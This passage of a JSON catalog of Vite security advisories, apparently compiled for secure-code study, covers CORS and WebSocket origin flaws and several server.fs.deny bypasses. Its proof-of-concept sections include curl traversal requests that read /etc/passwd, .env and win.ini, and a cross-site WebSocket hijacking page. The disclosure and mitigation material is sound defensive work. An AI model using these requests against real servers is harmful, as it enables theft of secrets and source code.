"summary": "### Summary\nVite allowed any websites to send any requests to the development server and read the response due to default CORS settings and lack of validation on the Origin header for WebSocket connections.\n\n> [!WARNING]\n> This vulnerability even applies to users that only run the Vite dev server on the local machine and does not expose the dev server to the network.\n\n### Upgrade Path\nUsers that does not match either of the following conditions should be able to upgrade to a newer version of Vite that fixes the vulnerability without any additional configuration.\n\n- Using the backend integration feature\n- Using a reverse proxy in front of Vite\n- Accessing the development server via a domain other than `localhost` or `*.localhost`\n- Using a plugin / framework that connects to the WebSocket server on their own from the browser\n\n#### Using the backend integration feature\nIf you are using the backend integration feature and not setting [`server.origin`](https://vite.dev/config/server-options.html#server-origin), you need to add the origin of the backend server to the [`server.cors.origin`](https://github.com/expressjs/cors#configuration-options) option. Make sure to set a specific origin rather than `*`, otherwise any origin can access your development server.\n\n#### Using a reverse proxy in front of Vite\nIf you are using a reverse proxy in front of Vite and sending requests to Vite with a hostname other than `localhost` or `*.localhost`, you need to add the hostname to the new [`server.allowedHosts`](https://vite.dev/config/server-options.html#server-allowedhosts) option. For example, if the reverse proxy is sending requests to `http://vite:5173`, you need to add `vite` to the `server.allowedHosts` option.\n\n#### Accessing the development server via a domain other than `localhost` or `*.localhost`\nYou need to add the hostname to the new [`server.allowedHosts`](https://vite.dev/config/server-options.html#server-allowedhosts) option. 
For example, if you are accessing the development server via `http://foo.example.com:8080`, you need to add `foo.example.com` to the `server.allowedHosts` option.\n\n#### Using a plugin / framework that connects to the WebSocket server on their own from the browser\nIf you are using a plugin / framework, try upgrading to a newer version of Vite that fixes the vulnerability. If the WebSocket connection appears not to be working, the plugin / framework may have a code that connects to the WebSocket server on their own from the browser.\n\nIn that case, you can either:\n\n- fix the plugin / framework code to the make it compatible with the new version of Vite\n- set `legacy.skipWebSocketTokenCheck: true` to opt-out the fix for [2] while the plugin / framework is incompatible with the new version of Vite\n - When enabling this option, **make sure that you are aware of the security implications** described in the impact section of [2] above.\n\n### Mitigation without upgrading Vite\n#### [1]: Permissive default CORS settings\nSet `server.cors` to `false` or limit `server.cors.origin` to trusted origins.\n\n#### [2]: Lack of validation on the Origin header for WebSocket connections\nThere aren't any mitigations for this.\n\n#### [3]: Lack of validation on the Host header for HTTP requests\nUse Chrome 94+ or use HTTPS for the development server.\n\n### Details\n\nThere are three causes that allowed malicious websites to send any requests to the development server:\n\n#### [1]: Permissive default CORS settings\n\nVite sets the [`Access-Control-Allow-Origin`](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Access-Control-Allow-Origin) header depending on [`server.cors`](https://vite.dev/config/server-options.html#server-cors) option. The default value was `true` which sets `Access-Control-Allow-Origin: *`. This allows websites on any origin to `fetch` contents served on the development server.\n\nAttack scenario:\n\n1. 
The attacker serves a malicious web page (`http://malicious.example.com`).\n2. The user accesses the malicious web page.\n3. The attacker sends a `fetch('http://127.0.0.1:5173/main.js')` request by JS in that malicious web page. This request is normally blocked by same-origin policy, but that's not the case for the reasons above.\n4. The attacker gets the content of `http://127.0.0.1:5173/main.js`.\n\n#### [2]: Lack of validation on the Origin header for WebSocket connections\n\nVite starts a WebSocket server to handle HMR and other functionalities. This WebSocket server [did not perform validation on the Origin header](https://github.com/vitejs/vite/blob/v6.0.7/packages/vite/src/node/server/ws.ts#L145-L157) and was vulnerable to Cross-Site WebSocket Hijacking (CSWSH) attacks. With that attack, an attacker can read and write messages on the WebSocket connection. Vite only sends some information over the WebSocket connection ([list of the file paths that changed, the file content where the errored happened, etc.](https://github.com/vitejs/vite/blob/v6.0.7/packages/vite/types/hmrPayload.d.ts#L12-L72)), but plugins can send arbitrary messages and may include more sensitive information.\n\nAttack scenario:\n\n1. The attacker serves a malicious web page (`http://malicious.example.com`).\n2. The user accesses the malicious web page.\n3. The attacker runs `new WebSocket('http://127.0.0.1:5173', 'vite-hmr')` by JS in that malicious web page.\n4. The user edits some files.\n5. Vite sends some HMR messages over WebSocket.\n6. The attacker gets the content of the HMR messages.\n\n#### [3]: Lack of validation on the Host header for HTTP requests\n\nUnless [`server.https`](https://vite.dev/config/server-options.html#server-https) is set, Vite starts the development server on HTTP. Non-HTTPS servers are vulnerable to DNS rebinding attacks without validation on the Host header. But Vite did not perform validation on the Host header. 
By exploiting this vulnerability, an attacker can send arbitrary requests to the development server bypassing the same-origin policy.\n\n1. The attacker serves a malicious web page that is served on **HTTP** (`http://malicious.example.com:5173`) (HTTPS won't work).\n2. The user accesses the malicious web page.\n3. The attacker changes the DNS to point to 127.0.0.1 (or other private addresses).\n4. The attacker sends a `fetch('/main.js')` request by JS in that malicious web page.\n5. The attacker gets the content of `http://127.0.0.1:5173/main.js` bypassing the same origin policy.\n\n### Impact\n#### [1]: Permissive default CORS settings\nUsers with the default `server.cors` option may:\n\n- get the source code stolen by malicious websites\n- give the attacker access to functionalities that are not supposed to be exposed externally\n - Vite core does not have any functionality that causes changes somewhere else when receiving a request, but plugins may implement those functionalities and servers behind `server.proxy` may have those functionalities.\n\n#### [2]: Lack of validation on the Origin header for WebSocket connections\nAll users may get the file paths of the files that changed and the file content where the error happened be stolen by malicious websites.\n\nFor users that is using a plugin that sends messages over WebSocket, that content may be stolen by malicious websites.\n\nFor users that is using a plugin that has a functionality that is triggered by messages over WebSocket, that functionality may be exploited by malicious websites.\n\n#### [3]: Lack of validation on the Host header for HTTP requests\nUsers using HTTP for the development server and using a browser that is not Chrome 94+ may:\n\n- get the source code stolen by malicious websites\n- give the attacker access to functionalities that are not supposed to be exposed externally\n - Vite core does not have any functionality that causes changes somewhere else when receiving a request, but plugins 
may implement those functionalities and servers behind `server.proxy` may have those functionalities.\n\nChrome 94+ users are not affected for [3], because [sending a request to a private network page from public non-HTTPS page is forbidden](https://developer.chrome.com/blog/private-network-access-update#chrome_94) since Chrome 94.\n\n### Related Information\nSafari has [a bug that blocks requests to loopback addresses from HTTPS origins](https://bugs.webkit.org/show_bug.cgi?id=171934). This means that when the user is using Safari and Vite is listening on loopback addresses, there's another condition of \"the malicious web page is served on HTTP\" for [1] and [2] to work.\n\n### PoC\n#### [2]: Lack of validation on the Origin header for WebSocket connections\n1. I used the `react` template which utilizes HMR functionality.\n\n```\nnpm create vite@latest my-vue-app-react -- --template react\n```\n\n2. Then on a malicious server, serve the following POC html:\n```html\n<!doctype html>\n<html lang=\"en\">\n <head>\n <meta charset=\"utf-8\" />\n <title>vite CSWSH</title>\n </head>\n <body>\n <div id=\"logs\"></div>\n <script>\n const div = document.querySelectorAll('#logs')[0];\n const ws = new WebSocket('ws://localhost:5173','vite-hmr');\n ws.onmessage = event => {\n const logLine = document.createElement('p');\n logLine.innerHTML = event.data;\n div.append(logLine);\n };\n </script>\n </body>\n</html>\n```\n\n3. Kick off Vite \n\n```\nnpm run dev\n```\n\n4. Load the development server (open `http://localhost:5173/`) as well as the malicious page in the browser. \n5. Edit `src/App.jsx` file and intentionally place a syntax error\n6. Notice how the malicious page can view the websocket messages and a snippet of the source code is exposed\n\nHere's a video demonstrating the POC:\n\nhttps://github.com/user-attachments/assets/a4ad05cd-0b34-461c-9ff6-d7c8663d6961",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-01-21T19:52:55Z",
"updated_at": "2026-02-04T04:37:03.076966Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-vg6x-rcgg-rjx6",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-24010",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-24010",
"GHSA-vg6x-rcgg-rjx6"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary",
"dom-sink-hardening",
"token-cookie-storage",
"plugin-extension-trust-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-30208": {
"canonical_id": "vite--CVE-2025-30208",
"title": "Vite bypasses server.fs.deny when using ?raw??",
"summary": "### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\nOnly apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes.\n\n### PoC\n```bash\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n <body>\n <h1>403 Restricted</h1>\n <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw??\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-03-25T14:00:02Z",
"updated_at": "2026-02-04T03:13:24.371631Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-30208",
"https://github.com/vitejs/vite/commit/315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4",
"https://github.com/vitejs/vite/commit/80381c38d6f068b12e6e928cd3c616bd1d64803c",
"https://github.com/vitejs/vite/commit/807d7f06d33ab49c48a2a3501da3eea1906c0d41",
"https://github.com/vitejs/vite/commit/92ca12dc79118bf66f2b32ff81ed09e0d0bd07ca",
"https://github.com/vitejs/vite/commit/f234b5744d8b74c95535a7b82cc88ed2144263c1",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-30208",
"GHSA-x574-m823-4x7w"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-31125": {
"canonical_id": "vite--CVE-2025-31125",
"title": "Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query",
"summary": "### Summary\n\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\nOnly apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n\n- base64 encoded content of non-allowed files is exposed using `?inline&import` (originally reported as `?import&?inline=1.wasm?init`)\n- content of non-allowed files is exposed using `?raw?import`\n\n`/@fs/` isn't needed to reproduce the issue for files inside the project root.\n\n### PoC\n\nOriginal report (check details above for simplified cases):\n\nThe ?import&?inline=1.wasm?init ending allows attackers to read arbitrary files and returns the file content if it exists. Base64 decoding needs to be performed twice\n```\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n```\n\nExample full URL `http://localhost:5173/@fs/C:/windows/win.ini?import&?inline=1.wasm?init`",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-03-31T17:31:54Z",
"updated_at": "2026-02-04T04:37:24.129476Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-4r4m-qw57-chr8",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-31125",
"https://github.com/vitejs/vite/commit/59673137c45ac2bcfad1170d954347c1a17ab949",
"https://github.com/vitejs/vite",
"https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-31125"
],
"aliases": [
"CVE-2025-31125",
"GHSA-4r4m-qw57-chr8"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-31486": {
"canonical_id": "vite--CVE-2025-31486",
"title": "Vite allows server.fs.deny to be bypassed with .svg or relative paths",
"summary": "### Summary\n\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\n\nOnly apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n\n#### `.svg`\n\nRequests ending with `.svg` are loaded at this line.\nhttps://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290\nBy adding `?.svg` with `?.wasm?init` or with `sec-fetch-dest: script` header, the restriction could be bypassed.\n\nThis bypass is only possible if the file is smaller than [`build.assetsInlineLimit`](https://vite.dev/config/build-options.html#build-assetsinlinelimit) (default: 4kB) and when using Vite 6.0+.\n\n#### relative paths\n\nThe check was applied before the id normalization. This allowed requests to bypass the check with relative paths (e.g. `../../`).\n\n### PoC\n\n```bash\nnpm create vite@latest\ncd vite-project/\nnpm install\nnpm run dev\n```\n\nsend request to read `etc/passwd`\n\n```bash\ncurl 'http://127.0.0.1:5173/etc/passwd?.svg?.wasm?init'\n```\n\n```bash\ncurl 'http://127.0.0.1:5173/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw'\n```",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "low",
"cvss_score": 3.1,
"exploit_status": "unknown",
"published_at": "2025-04-04T14:20:05Z",
"updated_at": "2026-02-04T03:51:38.412061Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-31486",
"https://github.com/vitejs/vite/commit/62d7e81ee189d65899bb65f3263ddbd85247b647",
"https://github.com/vitejs/vite",
"https://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290"
],
"aliases": [
"CVE-2025-31486",
"GHSA-xcj6-pq6g-qj4x"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-32395": {
"canonical_id": "vite--CVE-2025-32395",
"title": "Vite has an `server.fs.deny` bypass with an invalid `request-target`",
"summary": "### Summary\nThe contents of arbitrary files can be returned to the browser if the dev server is running on Node or Bun.\n\n### Impact\nOnly apps with the following conditions are affected.\n\n- explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host))\n- running the Vite dev server on runtimes that are not Deno (e.g. Node, Bun)\n\n### Details\n\n[HTTP 1.1 spec (RFC 9112) does not allow `#` in `request-target`](https://datatracker.ietf.org/doc/html/rfc9112#section-3.2). An attacker can nevertheless send such a request. For those requests with an invalid `request-line` (it includes `request-target`), the spec [recommends rejecting them with 400 or 301](https://datatracker.ietf.org/doc/html/rfc9112#section-3.2-4). The same can be said for HTTP 2 ([ref1](https://datatracker.ietf.org/doc/html/rfc9113#section-8.3.1-2.4.1), [ref2](https://datatracker.ietf.org/doc/html/rfc9113#section-8.3.1-3), [ref3](https://datatracker.ietf.org/doc/html/rfc9113#section-8.1.1-3)).\n\nOn Node and Bun, those requests are not rejected internally and are passed to user land. For those requests, the value of [`http.IncomingMessage.url`](https://nodejs.org/docs/latest-v22.x/api/http.html#messageurl) contains `#`. Vite assumed `req.url` won't contain `#` when checking `server.fs.deny`, allowing those kinds of requests to bypass the check.\n\nOn Deno, those requests are not rejected internally and are passed to user land as well. But for those requests, the value of `http.IncomingMessage.url` did not contain `#`. \n\n### PoC\n```\nnpm create vite@latest\ncd vite-project/\nnpm install\nnpm run dev\n```\nsend request to read `/etc/passwd`\n```\ncurl --request-target /@fs/Users/doggy/Desktop/vite-project/#/../../../../../etc/passwd http://127.0.0.1:5173\n```",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"published_at": "2025-04-11T14:06:03Z",
"updated_at": "2026-02-04T04:11:44.900383Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-356w-63v5-8wf4",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-32395",
"https://github.com/vitejs/vite/commit/175a83909f02d3b554452a7bd02b9f340cdfef70",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-32395",
"GHSA-356w-63v5-8wf4"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-46565": {
"canonical_id": "vite--CVE-2025-46565",
"title": "Vite's server.fs.deny bypassed with /. for files under project root",
"summary": "### Summary\nThe contents of files in [the project `root`](https://vite.dev/config/shared-options.html#root) that are denied by a file matching pattern can be returned to the browser.\n\n### Impact\n\nOnly apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\nOnly files that are under [project `root`](https://vite.dev/config/shared-options.html#root) and are denied by a file matching pattern can be bypassed.\n\n- Examples of file matching patterns: `.env`, `.env.*`, `*.{crt,pem}`, `**/.env`\n- Examples of other patterns: `**/.git/**`, `.git/**`, `.git/**/*`\n\n### Details\n[`server.fs.deny`](https://vite.dev/config/server-options.html#server-fs-deny) can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns).\nThese patterns could be bypassed for files under `root` by using a combination of slash and dot (`/.`).\n\n### PoC\n```\nnpm create vite@latest\ncd vite-project/\ncat \"secret\" > .env\nnpm install\nnpm run dev\ncurl --request-target /.env/. http://localhost:5173\n```\n\n![image](https://github.com/user-attachments/assets/822f4416-aa42-461f-8c95-a88d155e674b)\n![image](https://github.com/user-attachments/assets/42902144-863a-4afb-ac5b-fc16effa37cc)",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"published_at": "2025-04-30T17:40:27Z",
"updated_at": "2026-02-04T03:27:17.681639Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-859w-5945-r5v3",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-46565",
"https://github.com/vitejs/vite/commit/c22c43de612eebb6c182dd67850c24e4fab8cacb",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-46565",
"GHSA-859w-5945-r5v3"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-58751": {
"canonical_id": "vite--CVE-2025-58751",
"title": "Vite middleware may serve files starting with the same name with the public directory",
"summary": "### Summary\nFiles starting with the same name with the public directory were served bypassing the `server.fs` settings.\n\n### Impact\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host))\n- uses [the public directory feature](https://vite.dev/guide/assets.html#the-public-directory) (enabled by default)\n- a symlink exists in the public directory\n\n### Details\nThe [servePublicMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L79) function is in charge of serving public files from the server. It returns the [viteServePublicMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L106) function which runs the needed tests and serves the page. The viteServePublicMiddleware function [checks if the publicFiles variable is defined](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L111), and then uses it to determine if the requested page is public. In the case that the publicFiles is undefined, the code will treat the requested page as a public page, and go on with the serving function. [publicFiles may be undefined if there is a symbolic link anywhere inside the public directory](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/publicDir.ts#L21). In that case, every requested page will be passed to the public serving function. The serving function is based on the [sirv](https://github.com/lukeed/sirv) library. 
Vite patches the library to add the possibility to test loading access to pages, but when the public page middleware [disables this functionality](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L89) since public pages are meant to be available always, regardless of whether they are in the allow or deny list.\n\nIn the case of public pages, the serving function is [provided with the path to the public directory](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L85) as a root directory. The code of the sirv library [uses the join function to get the full path to the requested file](https://github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L42). For example, if the public directory is \"/www/public\", and the requested file is \"myfile\", the code will join them to the string \"/www/public/myfile\". The code will then pass this string to the normalize function. Afterwards, the code will [use the string's startsWith function](https://github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L43) to determine whether the created path is within the given directory or not. Only if it is, it will be served.\n\nSince [sirv trims the trailing slash of the public directory](https://github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L119), the string's startsWith function may return true even if the created path is not within the public directory. For example, if the server's root is at \"/www\", and the public directory is at \"/www/p\", if the created path will be \"/www/private.txt\", the startsWith function will still return true, because the string \"/www/private.txt\" starts with\u00a0 \"/www/p\". To achieve this, the attacker will use \"..\" to ask for the file \"../private.txt\". 
The code will then join it to the \"/www/p\" string, and will receive \"/www/p/../private.txt\". Then, the normalize function will return \"/www/private.txt\", which will then be passed to the startsWith function, which will return true, and the processing of the page will continue without checking the deny list (since this is the public directory middleware which doesn't check that).\n\n### PoC\nExecute the following shell commands:\n\n```\nnpm create vite@latest\ncd vite-project/\nmkdir p\ncd p\nln -s a b\ncd ..\necho 'import path from \"node:path\"; import { defineConfig } from \"vite\"; export default defineConfig({publicDir: path.resolve(__dirname, \"p/\"), server: {fs: {deny: [path.resolve(__dirname, \"private.txt\")]}}})' > vite.config.js\necho \"secret\" > private.txt\nnpm install\nnpm run dev\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/private.txt'`\n\nYou will receive a 403 HTTP Response,\u00a0 because private.txt is denied.\n\nNow in the same shell run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/../private.txt'`\n\nYou will receive the contents of private.txt.\n\n### Related links\n- https://github.com/lukeed/sirv/commit/f0113f3f8266328d804ee808f763a3c11f8997eb",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"published_at": "2025-09-09T20:55:56Z",
"updated_at": "2026-02-04T04:33:22.508417Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-g4jq-h2w9-997c",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-58751",
"https://github.com/lukeed/sirv/commit/f0113f3f8266328d804ee808f763a3c11f8997eb",
"https://github.com/vitejs/vite/commit/09f2b52e8d5907f26602653caf41b3a56692600d",
"https://github.com/vitejs/vite/commit/4f1c35bcbb5830290c694aa14b6789e07450f069",
"https://github.com/vitejs/vite/commit/63e2a5d232218f3f8d852056751e609a5367aaec",
"https://github.com/vitejs/vite/commit/e11d24008b97d4ca731ecc1a3b95260a6d12e7e0",
"https://github.com/vitejs/vite"
],
"aliases": [
"CVE-2025-58751",
"GHSA-g4jq-h2w9-997c"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-58752": {
"canonical_id": "vite--CVE-2025-58752",
"title": "Vite's `server.fs` settings were not applied to HTML files",
"summary": "### Summary\nAny HTML files on the machine were served regardless of the `server.fs` settings.\n\n### Impact\n\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host))\n- `appType: 'spa'` (default) or `appType: 'mpa'` is used\n\nThis vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served.\n\n### Details\nThe [serveStaticMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L123) function is in charge of serving static files from the server. It returns the [viteServeStaticMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L136) function which runs the needed tests and serves the page. The viteServeStaticMiddleware function [checks if the extension of the requested file is \".html\"](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L144). If so, it doesn't serve the page. Instead, the server will go on to the next middlewares, in this case [htmlFallbackMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/htmlFallback.ts#L14), and then to [indexHtmlMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/indexHtml.ts#L438). These middlewares don't perform any test against allow or deny rules, and they don't make sure that the accessed file is in the root directory of the server. 
They just find the file and send back its contents to the client.\n\n### PoC\nExecute the following shell commands:\n\n```\nnpm create vite@latest\ncd vite-project/\necho \"secret\" > /tmp/secret.html\nnpm install\nnpm run dev\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/../../../../../../../../../../../tmp/secret.html'`\n\nThe contents of /tmp/secret.html will be returned.\n\nThis will also work for HTML files that are in the root directory of the project, but are in the deny list (or not in the allow list). Test that by stopping the running server (CTRL+C), and running the following commands in the server's shell:\n\n```\necho 'import path from \"node:path\"; import { defineConfig } from \"vite\"; export default defineConfig({server: {fs: {deny: [path.resolve(__dirname, \"secret_files/*\")]}}})' > vite.config.js\nmkdir secret_files\necho \"secret txt\" > secret_files/secret.txt\necho \"secret html\" > secret_files/secret.html\nnpm run dev\n\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/secret_files/secret.txt'`\n\nYou will receive a 403 HTTP Response, because everything in the secret_files directory is denied.\n\nNow in the same shell run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/secret_files/secret.html'`\n\nYou will receive the contents of secret_files/secret.html.",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
"published_at": "2025-09-09T20:54:42Z",
"updated_at": "2026-02-04T04:35:16.287471Z",
"official_source_url": "https://github.com/vitejs/vite/security/advisories/GHSA-jqfw-vq24-v9c3",
"secondary_source_urls": [
"https://nvd.nist.gov/vuln/detail/CVE-2025-58752",
"https://github.com/vitejs/vite/commit/0ab19ea9fcb66f544328f442cf6e70f7c0528d5f",
"https://github.com/vitejs/vite/commit/14015d794f69accba68798bd0e15135bc51c9c1e",
"https://github.com/vitejs/vite/commit/482000f57f56fe6ff2e905305100cfe03043ddea",
"https://github.com/vitejs/vite/commit/6f01ff4fe072bcfcd4e2a84811772b818cd51fe6",
"https://github.com/vitejs/vite",
"https://github.com/vitejs/vite/blob/v7.1.5/packages/vite/CHANGELOG.md"
],
"aliases": [
"CVE-2025-58752",
"GHSA-jqfw-vq24-v9c3"
],
"secure_code_topics": [
"dependency-upgrade-policy",
"file-upload-validation",
"proxy-trust-boundary",
"plugin-extension-trust-policy"
],
"verification_status": "triage-manual",
"verification_mode": "synthetic",
"artifact_mode": "synthetic",
"blocked_reason": null,
"browser_evidence": {
"required": false,
"present": false,
"refs": []
}
},
"vite--CVE-2025-62522": {
"canonical_id": "vite--CVE-2025-62522",
"title": "vite allows server.fs.deny bypass via backslash on Windows",
"summary": "### Summary\nFiles denied by [`server.fs.deny`](https://vitejs.dev/config/server-options.html#server-fs-deny) were sent if the URL ended with `\\` when the dev server is running on Windows.\n\n### Impact\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host))\n- running the dev server on Windows\n\n### Details\n`server.fs.deny` can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns). These patterns could be bypassed by using a backslash (`\\`). The root cause is that `fs.readFile('/foo.png/')` loads `/foo.png`.\n\n### PoC\n```shell\nnpm create vite@latest\ncd vite-project/\ncat \"secret\" > .env\nnpm install\nnpm run dev\ncurl --request-target /.env\\ http://localhost:5173\n```\n<img width=\"1593\" height=\"616\" alt=\"image\" src=\"https://github.com/user-attachments/assets/36212f4e-1d3c-4686-b16f-16b35ca9e175\" />",
"display_name": "Vite",
"system_id": "vite",
"category": "frameworks",
"severity": "medium",
"cvss_score": 4.0,
"exploit_status": "unknown",
